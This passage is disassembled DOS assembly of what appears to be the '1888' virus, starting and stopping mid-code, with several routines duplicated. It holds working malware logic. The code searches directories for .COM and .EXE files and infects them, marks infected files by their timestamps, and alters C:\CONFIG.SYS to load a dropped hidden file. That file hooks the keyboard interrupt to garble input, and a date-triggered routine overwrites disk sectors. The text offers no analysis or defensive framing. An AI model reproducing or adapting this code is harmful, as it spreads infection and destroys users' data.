20h,0C0h, 86h,0FCh, 18h, 62h + db 07h, 00h, 00h + db '1888.COM' + db 00h, 00h, 00h, 00h,0A6h,0EAh + db 0AAh, 03h, 00h,0CCh,0AAh, 03h + db 60h, 07h, 00h, 40h, 05h, 00h + db 60h, 07h, 00h, 01h,0C8h, 01h + db 19h, 01h, 00h, 00h, 69h, 53h + db 69h, 53h, 61h, 06h, 9Dh, 04h + db 16h, 32h, 21h, 00h, 7Bh, 1Ah + db 12h, 32h,0ADh, 04h, 69h, 53h + db 12h, 32h,0DEh, 07h + +1888 endp + +; +; SUBROUTINE +; + +sub_01F7 proc near + cmp data_011C,0 + jne loc_0207 ; Jump if not equal + mov ax,760h + mov data_011C,ax + mov data_0120,ax +loc_0207: + mov al,data_011E + mov data_011F,al + mov ax,data_0120 + mov data_0122,ax + inc data_0119 + mov data_019C,0 + mov data_019A,0 + mov data_019B,0 + retn +sub_01F7 endp + + +; +; SUBROUTINE +; + +sub_0227 proc near + lea dx,data_0183 ; Load effective addr + xor al,al ; Zero register + mov ah,3Dh ; '=' + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + jc loc_ret_0239 ; Jump if carry Set + mov bx,ax + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + +loc_ret_0239: + retn +sub_0227 endp + + +; +; SUBROUTINE +; + +sub_023A proc near + mov ah,2Ah ; '*' + int 21h ; DOS Services ah=function 2Ah + ; get date, cx=year, dh=month + ; dl=day, al=day-of-week 0=SUN + mov ah,dh + cmp cx,data_0130 + je loc_0249 ; Jump if equal + add ah,0Ch +loc_0249: + sub ah,data_0132 + mov data_011B,ah + mov data_0134,al + mov data_0133,dl + mov data_0132,dh + mov data_0130,cx + mov ah,2Ch ; ',' + int 21h ; DOS Services ah=function 2Ch + ; get time, cx=hrs/min, dx=sec + mov data_0135,ch + retn +sub_023A endp + + +; +; SUBROUTINE +; + +sub_0269 proc near + mov ax,es + dec ax + push es + mov es,ax + mov ax,es:d_8B38_0003_e + mov data_012A,ax + pop es + mov bx,ax + sub bx,200h + mov ah,4Ah ; 'J' + int 21h ; DOS Services ah=function 4Ah + ; change memory allocation + ; bx=bytes/16, es=mem segment + mov bx,150h + mov ah,48h ; 'H' + int 21h ; DOS Services ah=function 48h + ; allocate memory, bx=bytes/16 + mov word ptr data_012C+2,ax + retn +sub_0269 endp + + +; +; SUBROUTINE +; + +sub_028C proc near + push es + mov ax,word ptr data_012C+2 + mov es,ax + mov ah,49h ; 'I' + int 21h ; DOS Services ah=function 49h + ; release memory block, es=seg + mov ax,data_0128 + mov es,ax + mov bx,data_012A + mov ah,4Ah ; 'J' + int 21h ; DOS Services ah=function 4Ah + ; change memory allocation + ; bx=bytes/16, es=mem segment + pop es + retn +sub_028C endp + + +; +; SUBROUTINE +; + +sub_02A5 proc near + push ds + mov ah,1Bh + int 21h ; DOS Services ah=function 1Bh + ; get disk info, default drive + ; al=sectors per cluster + ; ds:bx=ptr to media ID byte + ; cx=sector size, dx=clusters + cmp byte ptr [bx],0F8h + pop ds + retn +sub_02A5 endp + + +; +; SUBROUTINE +; + +sub_02AF proc near + lea si,data_019D ; Load effective addr + mov di,si + xor dl,dl ; Zero register + mov ah,47h ; 'G' + int 21h ; DOS Services ah=function 47h + ; get present dir,drive dl,1=a: + ; ds:si=ASCIIZ directory name + mov cx,30h + mov al,0 + repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al + mov cx,di + sub cx,si + lea di,data_013A ; ('\DANGER\1888') Load effective addr + mov al,5Ch ; '\' + stosb ; Store al to es:[di] + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + retn +sub_02AF endp + + +; +; SUBROUTINE +; + +sub_02D0 proc near + mov data_0182,0 + lea bx,cs:[160h] ; Load effective addr + add bx,20h + mov data_0180,bx + sub bx,20h + lea dx,data_015A+4 ; ('*') Load effective addr + mov cx,33h + mov ah,4Eh ; 'N' + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + jc loc_031F ; Jump if carry Set +loc_02F0: + lea di,data_019D ; Load effective addr + add di,1Eh + cmp byte ptr [di],2Eh ; '.' + je loc_0319 ; Jump if equal + mov si,di + mov cx,20h + mov al,0 + repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al + mov cx,di + sub cx,si + mov di,bx + add bx,cx + cmp bx,data_0180 + ja loc_031F ; Jump if above + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + inc data_0182 +loc_0319: + mov ah,4Fh ; 'O' + int 21h ; DOS Services ah=function 4Fh + ; find next filename match + jnc loc_02F0 ; Jump if carry=0 +loc_031F: + lea bx,cs:[160h] ; Load effective addr + mov data_0180,bx + retn +sub_02D0 endp + + +; +; SUBROUTINE +; + +sub_0328 proc near + cmp data_0182,0 + je loc_ret_034C ; Jump if equal + lea dx,data_013A ; ('\DANGER\1888') Load effective addr + mov ah,3Bh ; ';' + int 21h ; DOS Services ah=function 3Bh + ; set current dir, path @ ds:dx + mov dx,data_0180 + mov di,dx + mov ah,3Bh ; ';' + int 21h ; DOS Services ah=function 3Bh + ; set current dir, path @ ds:dx + mov al,0 + mov cx,20h + repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al + mov data_0180,di + +loc_ret_034C: + retn +sub_0328 endp + + +; +; SUBROUTINE +; + +sub_034D proc near + mov ax,data_0104 + and al,1Fh + cmp al,1Eh + retn +sub_034D endp + + +; +; SUBROUTINE +; + +sub_0355 proc near + lea dx,data_0194 ; Load effective addr + cmp data_011E,0 + je loc_0364 ; Jump if equal + lea dx,data_018E ; Load effective addr +loc_0364: + mov cx,23h + mov ah,4Eh ; 'N' + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + retn +sub_0355 endp + + +; +; SUBROUTINE +; + +sub_036C proc near + lea si,data_019D ; Load effective addr + add si,15h + lea di,data_0103 ; Load effective addr + mov cx,16h + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + retn +sub_036C endp + + +; +; SUBROUTINE +; + +sub_037D proc near + pushf ; Push flags + mov cx,data_0104 + or cl,1Fh + and cl,0FEh + mov dx,data_0106 + mov ax,5701h + int 21h ; DOS Services ah=function 57h + ; set file date+time, bx=handle + ; cx=time, dx=time + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + lea dx,data_010C ; ('1888.COM') Load effective addr + xor ch,ch ; Zero register + mov cl,data_0103 + mov ax,4301h + int 21h ; DOS Services ah=function 43h + ; set attrb cx, filename @ds:dx + popf ; Pop flags + retn +sub_037D endp + + +; +; SUBROUTINE +; + +sub_03A6 proc near + lea dx,data_010C ; ('1888.COM') Load effective addr + xor cx,cx ; Zero register + mov ax,4301h + int 21h ; DOS Services ah=function 43h + ; set attrb cx, filename @ds:dx + jc loc_ret_03BA ; Jump if carry Set + mov ax,3D02h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + mov bx,ax + +loc_ret_03BA: + retn +sub_03A6 endp + + +; +; SUBROUTINE +; + +sub_03BB proc near + push ds + mov ax,word ptr data_012C+2 + mov ds,ax + mov cx,100h + xor dx,dx ; Zero register + mov ah,3Fh ; '?' + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + cmp word ptr ds:d_9E01_0000_e,5A4Dh + nop ;*ASM fixup - sign extn byte + je loc_03D6 ; Jump if equal + stc ; Set carry flag + jmp loc_0455 +loc_03D6: + call sub_0457 + push ax + mov ax,di + and ax,0Fh + mov cx,10h + xor dx,dx ; Zero register + sub cx,ax + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + jnc loc_03EF ; Jump if carry=0 + jmp short loc_0455 + db 90h +loc_03EF: + mov si,ax + mov cx,100h + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + jc loc_0455 ; Jump if carry Set + pop dx + mov ax,di + add ax,si + add ax,100h + cmp ax,200h + jb loc_040B ; Jump if below + and ax,1FFh + inc dx +loc_040B: + mov cl,4 + shr ax,cl ; Shift w/zeros fill + dec dx + mov cl,5 + shl dx,cl ; Shift w/zeros fill + sub dx,ds:d_9E01_0008_e + add ax,dx + sub ax,10h + mov ds:d_9E01_0016_e,ax + mov word ptr ds:d_9E01_0014_e,100h + push ds + mov ax,cs + mov ds,ax + mov cx,data_011C + mov dx,100h + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + pop ds + jc loc_0455 ; Jump if carry Set + call sub_0457 + mov ds:d_9E01_0002_e,di + mov ds:d_9E01_0004_e,ax + mov ax,4200h + xor dx,dx ; Zero register + xor cx,cx ; Zero register + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + jc loc_0455 ; Jump if carry Set + mov cx,100h + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer +loc_0455: + pop ds + retn +sub_03BB endp + + +; +; SUBROUTINE +; + +sub_0457 proc near + mov ax,4202h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov di,ax + and di,1FFh + mov cl,9 + shr ax,cl ; Shift w/zeros fill + mov cl,7 + shl dx,cl ; Shift w/zeros fill + add ax,dx + inc ax + retn +sub_0457 endp + + +; +; SUBROUTINE +; + +sub_0472 proc near + mov ax,data_0108 + mov data_0120,ax + mov cx,data_011C + cmp cx,ax + jb loc_0488 ; Jump if below + mov data_0120,cx + mov cx,data_0108 +loc_0488: + push ds + mov ax,word ptr data_012C+2 + mov ds,ax + xor dx,dx ; Zero register + mov ah,3Fh ; '?' + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + pop ds + jc loc_ret_04DD ; Jump if carry Set + mov ax,4200h + xor dx,dx ; Zero register + xor cx,cx ; Zero register + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + jc loc_ret_04DD ; Jump if carry Set + mov dx,100h + mov cx,data_011C + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + int 3 ; Debug breakpoint + cmp ax,cs:data_0108 + ja loc_04CC ; Jump if above + mov ax,4200h + mov dx,data_0108 + mov data_0120,dx + xor cx,cx ; Zero register + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + jc loc_ret_04DD ; Jump if carry Set + mov cx,data_011C + jmp short loc_04D0 +loc_04CC: + mov cx,data_0108 +loc_04D0: + push ds + mov ax,word ptr data_012C+2 + mov ds,ax + xor dx,dx ; Zero register + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + pop ds + +loc_ret_04DD: + retn +sub_0472 endp + + +; +; SUBROUTINE +; + +sub_04DE proc near + cmp data_011B,2 + ja loc_04E8 ; Jump if above + xor ax,ax ; Zero register + retn +loc_04E8: + mov al,data_0133 + and al,1 + retn +sub_04DE endp + + +; +; SUBROUTINE +; + +sub_04EE proc near + cmp data_0133,0Fh + jb loc_0507 ; Jump if below + mov al,data_0135 + cmp al,13h + jb loc_0507 ; Jump if below + mov ax,40h + mov es,ax + mov byte ptr es:d_0040_004A_e,23h ; '#' +loc_0507: + cmp data_0133,0Dh + jne loc_ret_0524 ; Jump if not equal + cmp data_0134,5 + jne loc_ret_0524 ; Jump if not equal + mov ax,301h + mov cx,1 + mov dx,50h + xor bx,bx ; Zero register + mov es,bx + int 13h ; Disk dl=drive ? ah=func 03h + ; write sectors from mem es:bx + ; al=#,ch=cyl,cl=sectr,dh=head + +loc_ret_0524: + retn +sub_04EE endp + + +; +; SUBROUTINE +; + +sub_0525 proc near + mov data_019B,1 + lea dx,data_05C1 ; Load effective addr + mov cx,27h + mov ah,4Eh ; 'N' + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + jnc loc_0564 ; Jump if carry=0 + mov ah,3Ch ; '<' + mov cx,6 + int 21h ; DOS Services ah=function 3Ch + ; create/truncate file @ ds:dx + mov bx,ax + lea dx,data_05EE ; Load effective addr + mov cx,data_070A + mov si,dx + add si,data_00B3_e + mov ax,data_0130 + mov [si],ax + mov ah,data_0132 + mov [si+2],ah + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + jc loc_05BD ; Jump if carry Set +loc_0564: + lea dx,data_05C7 ; Load effective addr + mov cx,27h + mov ah,4Eh ; 'N' + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + jc loc_05BD ; Jump if carry Set + call sub_036C + xor cx,cx ; Zero register + mov ax,4301h + int 21h ; DOS Services ah=function 43h + ; set attrb cx, filename @ds:dx + mov ax,3D02h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + mov bx,ax + jc loc_05BD ; Jump if carry Set + mov cx,data_0108 + push es + push ds + mov ax,word ptr data_012C+2 + mov ds,ax + mov es,ax + xor dx,dx ; Zero register + mov ah,3Fh ; '?' + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + pop ds + mov dx,ax + mov ax,0FFFFh + xor di,di ; Zero register + repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al + cmp ax,es:[di-1] + pop es + jz loc_05BD ; Jump if zero + mov ax,4200h + xor cx,cx ; Zero register + dec dx + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + jc loc_05BD ; Jump if carry Set + lea dx,data_05D5 ; Load effective addr + mov cx,19h + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer +loc_05BD: + call sub_037D + retn +sub_0525 endp + +data_05C1 db 43h + db 3Ah, 5Ch,0FFh,0FFh, 00h +data_05C7 db 'C:\CONFIG.SYS', 0 +data_05D5 db 'DEVICE =' + db 0FFh,0FFh + db ' COUNTRY.SYS', 0Dh, 0Ah + db 1Ah +data_05EE db 0FFh + db 0FFh,0FFh,0FFh, 40h,0C8h, 16h + db 00h, 21h, 00h + db 'hgt42 ' + db 00h, 00h, 00h, 00h, 2Eh, 89h + db 1Eh, 12h, 00h, 2Eh, 8Ch, 06h + db 14h, 00h,0CBh, 1Eh, 06h, 0Eh + db 1Fh,0C4h, 3Eh, 12h, 00h, 26h + db 8Ah, 45h, 02h, 3Ch, 00h, 75h + db 03h,0E8h, 82h, 00h + db 0Dh, 00h, 10h, 26h, 89h, 45h + db 03h, 07h, 1Fh,0CBh, 50h, 53h + db 51h, 1Eh + db 0E4h, 60h,0A8h, 80h, 75h, 30h + db 2Eh, 8Bh, 1Eh,0A9h, 00h, 3Ah + db 0C7h, 75h, 27h,0B8h, 40h, 00h + db 8Eh,0D8h,0E8h, 28h, 00h, 25h + db 05h, 00h, 8Bh,0C8h + db 0BBh, 1Ch, 00h + +locloop_064F: + mov ax,cs:data_00A9_e + mov [bx],ax + add bx,2 + cmp bx,3Fh + jb loc_0660 ; Jump if below + mov bx,1Eh +loc_0660: + mov word ptr ds:[1Ch],bx + loop locloop_064F ; Loop if cx > 0 + +loc_0666: + pop ds + pop cx + pop bx + pop ax + jmp dword ptr cs:data_00A3_e + +; +; SUBROUTINE +; + +sub_066F proc near + mov ax,cs:data_00A7_e + push ax + and ah,0B4h + pop ax + jp loc_067B ; Jump if parity=1 + stc ; Set carry flag +loc_067B: + rcl ax,1 ; Rotate thru carry + mov cs:data_00A7_e,ax + retn +sub_066F endp + + db 'hgt42 ' + db 00h, 56h, 31h, 00h, 46h, 52h + db 44h, 00h, 00h, 00h, 00h, 00h + db 00h, 65h, 12h, 65h, 73h, 74h + db 6Eh, 12h, 1Fh, 14h, 31h,0CDh + db 0ABh,0EFh + db 06h, 57h,0B4h, 2Ah,0CDh, 21h + db 8Ah,0E6h, 3Bh, 0Eh,0B3h, 00h + db 74h, 03h, 80h,0C4h + db 0Ch +loc_06B5: + sub ah,ds:data_00B5_e + cmp ah,3 + jb loc_06FB ; Jump if below + mov ds:data_00B5_e,dh + mov ds:data_00B3_e,cx + mov ah,2Ch ; ',' + int 21h ; DOS Services ah=function 2Ch + ; get time, cx=hrs/min, dx=sec + mov ds:data_00A7_e,dx + call sub_066F + mov bx,ax + and bx,3 + nop ;*ASM fixup - sign extn byte + mov al,ds:data_00AB_e[bx] + mov ah,ds:data_00AF_e[bx] + mov ds:data_00A9_e,ax + mov ax,3516h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov ds:data_00A3_e,bx + mov bx,es + mov word ptr ds:data_00A3_e+2,bx + cli ; Disable interrupts +;* mov dx,offset loc_003E ;* + db 0BAh, 3Eh, 00h + mov ax,2516h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + sti ; Enable interrupts +loc_06FB: + pop di + pop es + mov word ptr es:[di+0Eh],0B6h + mov es:[di+10h],cs + xor ax,ax ; Zero register + retn +data_070A dw 11Ch +data_070C db 8Bh + db 1Eh, 28h, 01h,0A1h, 26h, 01h + db 8Eh,0D0h, 8Bh, 26h, 24h, 01h + dw 0EC83h, 8B04h + dw 80F4h, 1F3Eh + dw 1, 2875h + dw 0BFh, 3601h + dw 3C89h, 0FB8Bh + dw 8936h, 27Ch + dw 0FF33h, 8936h + dw 47Ch, 0BFh + dw 8B01h, 2236h + dw 301h, 8BF7h + dw 1C0Eh, 8C01h + dw 8ED8h, 0F3C0h + dw 0EBA4h, 9016h + db 8Bh,0FBh, 83h,0C7h, 10h,0A1h + db 16h, 00h, 03h,0F8h, 36h, 89h + db 7Ch, 02h, 8Bh, 3Eh, 14h, 00h + db 36h, 89h + db 3Ch + db 8Eh,0DBh, 8Eh,0C3h,0CBh +loc_0767: + mov ax,ss + mov cs:data_0126,ax + mov cs:data_0124,sp + mov ax,cs + mov ss,ax + mov sp,1F7h + push ds + mov ds,ax + pop ax + mov data_0128,ax + call sub_0269 + mov ax,cs + mov es,ax + call sub_01F7 + mov dx,offset data_019D + mov ah,1Ah + int 21h ; DOS Services ah=function 1Ah + ; set DTA(disk xfer area) ds:dx + call sub_02AF + call sub_02A5 + jnc loc_079C ; Jump if carry=0 + jmp loc_083A +loc_079C: + call sub_0227 + jc loc_07A4 ; Jump if carry Set + jmp loc_083A +loc_07A4: + call sub_023A + call sub_02D0 + mov data_011E,0 +loc_07AF: + call sub_0355 + jc loc_0800 ; Jump if carry Set +loc_07B4: + cmp data_019C,4 + ja loc_083A ; Jump if above + call sub_036C + call sub_034D + jnc loc_07FA ; Jump if carry=0 + cmp data_010A,4 + ja loc_07FA ; Jump if above + call sub_03A6 + jc loc_083A ; Jump if carry Set + cmp data_011E,0 + je loc_07DB ; Jump if equal + call sub_03BB + jmp short loc_07DE +loc_07DB: + call sub_0472 +loc_07DE: + call sub_037D + jc loc_083A ; Jump if carry Set + inc data_019C + cmp data_019B,1 + je loc_07FA ; Jump if equal + call sub_04DE + jz loc_07FA ; Jump if zero + call sub_0525 + jc loc_083A ; Jump if carry Set + jmp short loc_07AF +loc_07FA: + mov ah,4Fh ; 'O' + int 21h ; DOS Services ah=function 4Fh + ; find next filename match + jnc loc_07B4 ; Jump if carry=0 +loc_0800: + cmp data_011E,1 + je loc_080E ; Jump if equal + mov data_011E,1 + jmp short loc_07AF +loc_080E: + mov data_011E,0 + cmp data_019A,0 + jne loc_0829 ; Jump if not equal + lea dx,data_015A ; ('C:\') Load effective addr + mov ah,3Bh ; ';' + int 21h ; DOS Services ah=function 3Bh + ; set current dir, path @ ds:dx + mov data_019A,0FFh + jmp short loc_07AF +loc_0829: + cmp data_0182,0 + je loc_083A ; Jump if equal + call sub_0328 + dec data_0182 + jmp loc_07AF +loc_083A: + lea dx,data_013A ; ('\DANGER\1888') Load effective addr + mov ah,3Bh ; ';' + int 21h ; DOS Services ah=function 3Bh + ; set current dir, path @ ds:dx + call sub_04DE + jz loc_084A ; Jump if zero + call sub_04EE +loc_084A: + mov ax,word ptr data_012C+2 + mov es,ax + mov cx,5Bh + mov si,offset data_070C + xor di,di ; Zero register + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + call sub_028C + call data_012C + int 20h ; DOS program terminate + db 0E9h, 64h, 06h, 20h,0A4h, 86h + db 0FCh, 18h, 02h, 00h, 00h, 00h + db 31h, 2Eh, 43h, 4Fh, 4Dh, 00h + db 20h, 20h, 4Dh, 00h, 00h, 00h + db 0A6h, 24h, 00h, 00h, 60h, 07h + db 00h, 00h, 60h, 07h, 60h, 07h + db 0FEh,0FFh, 6Ch, 0Dh, 6Ch, 0Dh + db 94h, 92h, 00h, 00h, 01h, 9Eh + db 0C8h, 07h, 07h, 1Ch, 02h, 10h + db 00h, 00h, 00h, 00h, 5Ch, 00h + db 4Fh, 53h, 53h, 49h, 00h, 45h + db 4Eh, 00h + db 53h, 54h + db 20 dup (0) + db 'C:\', 0 + db '*', 0 + db 'NETWARE', 0 + db 'LMS', 0 + db 'MAUS', 0 + db 'MDB', 0 + db 'DOS', 0 + db 'BASE', 0 + db 'L', 0 + db '`' + db 01h, 00h, 01h, 14h, 17h, 6Eh + db 00h, 01h,0A9h, 00h, 01h,0BFh + db 38h, 2Ah, 2Eh, 65h, 78h, 65h + db 00h, 2Ah, 2Eh, 63h, 6Fh, 6Dh + db 00h, 00h, 00h, 04h, 01h + db 3Fh + db 7 dup (3Fh) + db 43h, 4Fh, 4Dh, 23h, 0Ah, 00h + db 00h, 00h, 31h,0C0h, 50h, 9Ah + db 20h,0A4h, 86h,0FCh, 18h, 02h + db 00h, 00h, 00h, 31h, 2Eh, 43h + db 4Fh, 4Dh, 00h, 20h, 20h, 4Dh + db 00h, 00h, 00h,0A6h,0EAh,0AAh + db 03h, 00h,0CCh,0AAh, 03h, 00h + db 00h, 31h, 31h, 00h, 40h, 48h + db 07h, 00h, 40h, 6Ch, 15h, 6Ch + db 15h, 00h, 40h, 05h, 00h, 60h + db 07h, 00h, 01h,0C8h, 01h, 19h + db 01h, 82h, 08h, 6Ch, 0Dh, 6Ch + db 0Dh,0ADh, 04h, 6Ch, 0Dh, 46h + db 72h,0DEh, 07h + +; +; SUBROUTINE +; + +sub_0959 proc near + cmp data_011C,0 + jne loc_0969 ; Jump if not equal + mov ax,760h + mov data_011C,ax + mov data_0120,ax +loc_0969: + mov al,data_011E + mov data_011F,al + mov ax,data_0120 + mov data_0122,ax + inc data_0119 + mov data_019C,0 + mov data_019A,0 + mov data_019B,0 + retn +sub_0959 endp + + +; +; SUBROUTINE +; + +sub_0989 proc near + lea dx,data_0183 ; Load effective addr + xor al,al ; Zero register + mov ah,3Dh ; '=' + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + jc loc_ret_099B ; Jump if carry Set + mov bx,ax + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + +loc_ret_099B: + retn +sub_0989 endp + + +; +; SUBROUTINE +; + +sub_099C proc near + mov ah,2Ah ; '*' + int 21h ; DOS Services ah=function 2Ah + ; get date, cx=year, dh=month + ; dl=day, al=day-of-week 0=SUN + mov ah,dh + cmp cx,data_0130 + je loc_09AB ; Jump if equal + add ah,0Ch +loc_09AB: + sub ah,data_0132 + mov data_011B,ah + mov data_0134,al + mov data_0133,dl + mov data_0132,dh + mov data_0130,cx + mov ah,2Ch ; ',' + int 21h ; DOS Services ah=function 2Ch + ; get time, cx=hrs/min, dx=sec + mov data_0135,ch + retn +sub_099C endp + + +; +; SUBROUTINE +; + +sub_09CB proc near + mov ax,es + dec ax + push es + mov es,ax + mov ax,es:d_8B38_0003_e + mov data_012A,ax + pop es + mov bx,ax + sub bx,200h + mov ah,4Ah ; 'J' + int 21h ; DOS Services ah=function 4Ah + ; change memory allocation + ; bx=bytes/16, es=mem segment + mov bx,150h + mov ah,48h ; 'H' + int 21h ; DOS Services ah=function 48h + ; allocate memory, bx=bytes/16 + mov word ptr data_012C+2,ax + retn +sub_09CB endp + + +; +; SUBROUTINE +; + +sub_09EE proc near + push es + mov ax,word ptr data_012C+2 + mov es,ax + mov ah,49h ; 'I' + int 21h ; DOS Services ah=function 49h + ; release memory block, es=seg + mov ax,data_0128 + mov es,ax + mov bx,data_012A + mov ah,4Ah ; 'J' + int 21h ; DOS Services ah=function 4Ah + ; change memory allocation + ; bx=bytes/16, es=mem segment + pop es + retn +sub_09EE endp + + +; +; SUBROUTINE +; + +sub_0A07 proc near + push ds + mov ah,1Bh + int 21h ; DOS Services ah=function 1Bh + ; get disk info, default drive + ; al=sectors per cluster + ; ds:bx=ptr to media ID byte + ; cx=sector size, dx=clusters + cmp byte ptr [bx],0F8h + pop ds + retn +sub_0A07 endp + + +; +; SUBROUTINE +; + +sub_0A11 proc near + lea si,data_019D ; Load effective addr + mov di,si + xor dl,dl ; Zero register + mov ah,47h ; 'G' + int 21h ; DOS Services ah=function 47h + ; get present dir,drive dl,1=a: + ; ds:si=ASCIIZ directory name + mov cx,30h + mov al,0 + repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al + mov cx,di + sub cx,si + lea di,data_013A ; ('\DANGER\1888') Load effective addr + mov al,5Ch ; '\' + stosb ; Store al to es:[di] + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + retn +sub_0A11 endp + + +; +; SUBROUTINE +; + +sub_0A32 proc near + mov data_0182,0 + lea bx,cs:[160h] ; Load effective addr + add bx,20h + mov data_0180,bx + sub bx,20h + lea dx,data_015A+4 ; ('*') Load effective addr + mov cx,33h + mov ah,4Eh ; 'N' + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + jc loc_0A81 ; Jump if carry Set +loc_0A52: + lea di,data_019D ; Load effective addr + add di,1Eh + cmp byte ptr [di],2Eh ; '.' + je loc_0A7B ; Jump if equal + mov si,di + mov cx,20h + mov al,0 + repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al + mov cx,di + sub cx,si + mov di,bx + add bx,cx + cmp bx,data_0180 + ja loc_0A81 ; Jump if above + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + inc data_0182 +loc_0A7B: + mov ah,4Fh ; 'O' + int 21h ; DOS Services ah=function 4Fh + ; find next filename match + jnc loc_0A52 ; Jump if carry=0 +loc_0A81: + lea bx,cs:[160h] ; Load effective addr + mov data_0180,bx + retn +sub_0A32 endp + + +; +; SUBROUTINE +; + +sub_0A8A proc near + cmp data_0182,0 + je loc_ret_0AAE ; Jump if equal + lea dx,data_013A ; ('\DANGER\1888') Load effective addr + mov ah,3Bh ; ';' + int 21h ; DOS Services ah=function 3Bh + ; set current dir, path @ ds:dx + mov dx,data_0180 + mov di,dx + mov ah,3Bh ; ';' + int 21h ; DOS Services ah=function 3Bh + ; set current dir, path @ ds:dx + mov al,0 + mov cx,20h + repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al + mov data_0180,di + +loc_ret_0AAE: + retn +sub_0A8A endp + + +; +; SUBROUTINE +; + +sub_0AAF proc near + mov ax,data_0104 + and al,1Fh + cmp al,1Eh + retn +sub_0AAF endp + + +; +; SUBROUTINE +; + +sub_0AB7 proc near + lea dx,data_0194 ; Load effective addr + cmp data_011E,0 + je loc_0AC6 ; Jump if equal + lea dx,data_018E ; Load effective addr +loc_0AC6: + mov cx,23h + mov ah,4Eh ; 'N' + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + retn +sub_0AB7 endp + + +; +; SUBROUTINE +; + +sub_0ACE proc near + lea si,data_019D ; Load effective addr + add si,15h + lea di,data_0103 ; Load effective addr + mov cx,16h + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + retn +sub_0ACE endp + + +; +; SUBROUTINE +; + +sub_0ADF proc near + pushf ; Push flags + mov cx,data_0104 + or cl,1Fh + and cl,0FEh + mov dx,data_0106 + mov ax,5701h + int 21h ; DOS Services ah=function 57h + ; set file date+time, bx=handle + ; cx=time, dx=time + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + lea dx,data_010C ; ('1888.COM') Load effective addr + xor ch,ch ; Zero register + mov cl,data_0103 + mov ax,4301h + int 21h ; DOS Services ah=function 43h + ; set attrb cx, filename @ds:dx + popf ; Pop flags + retn +sub_0ADF endp + + +; +; SUBROUTINE +; + +sub_0B08 proc near + lea dx,data_010C ; ('1888.COM') Load effective addr + xor cx,cx ; Zero register + mov ax,4301h + int 21h ; DOS Services ah=function 43h + ; set attrb cx, filename @ds:dx + jc loc_ret_0B1C ; Jump if carry Set + mov ax,3D02h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + mov bx,ax + +loc_ret_0B1C: + retn +sub_0B08 endp + + +; +; SUBROUTINE +; + +sub_0B1D proc near + push ds + mov ax,word ptr data_012C+2 + mov ds,ax + mov cx,100h + xor dx,dx ; Zero register + mov ah,3Fh ; '?' + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + cmp word ptr ds:d_9E01_0000_e,5A4Dh + nop ;*ASM fixup - sign extn byte + je loc_0B38 ; Jump if equal + stc ; Set carry flag + jmp loc_0BB7 +loc_0B38: + call sub_0BB9 + push ax + mov ax,di + and ax,0Fh + mov cx,10h + xor dx,dx ; Zero register + sub cx,ax + mov ah,40h 